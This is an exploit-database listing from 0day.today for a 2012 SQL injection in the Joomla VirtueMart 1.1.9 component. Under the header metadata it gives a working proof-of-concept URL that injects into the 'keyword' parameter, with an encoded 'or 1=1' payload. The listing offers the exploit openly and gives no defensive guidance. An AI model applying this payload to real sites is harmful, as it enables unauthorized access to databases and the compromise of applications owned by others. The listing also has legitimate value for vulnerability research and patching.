[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla component (com_virtuemart) SQL injection Vulnerability

Author
ReeD
Risk
[
Security Risk High
]
0day-ID
0day-ID-18192
Category
web applications
Date add
04-05-2012
Platform
php
##################################################
# Exploit Title: joomla component (com_virtuemart) SQL injection Vulnerability
# Download: http://dev.virtuemart.net/attachments/download/287/VirtueMart_1.1.9-COMPLETE_PACKAGE.j15.zip
# Software Link: http://virtuemart.net/
# Date: 2012.05.04
# Category: webapps
# Author: ReeD
# E-mail: reed@wteam.ro
# Version: 1.1.9
##################################################

Exploiting these issue could allow an attacker to compromise the application, if i have user access.

[~]Exploit/p0c:
http://www.site.com/index.php?option=com_virtuemart&page=account.index&keyword=[sqli]

Example:
http://www.site.com/index.php?option=com_virtuemart&page=account.index&keyword=%25%2527%29+or+1%3D1%23



#  0day.today [2024-12-27]  #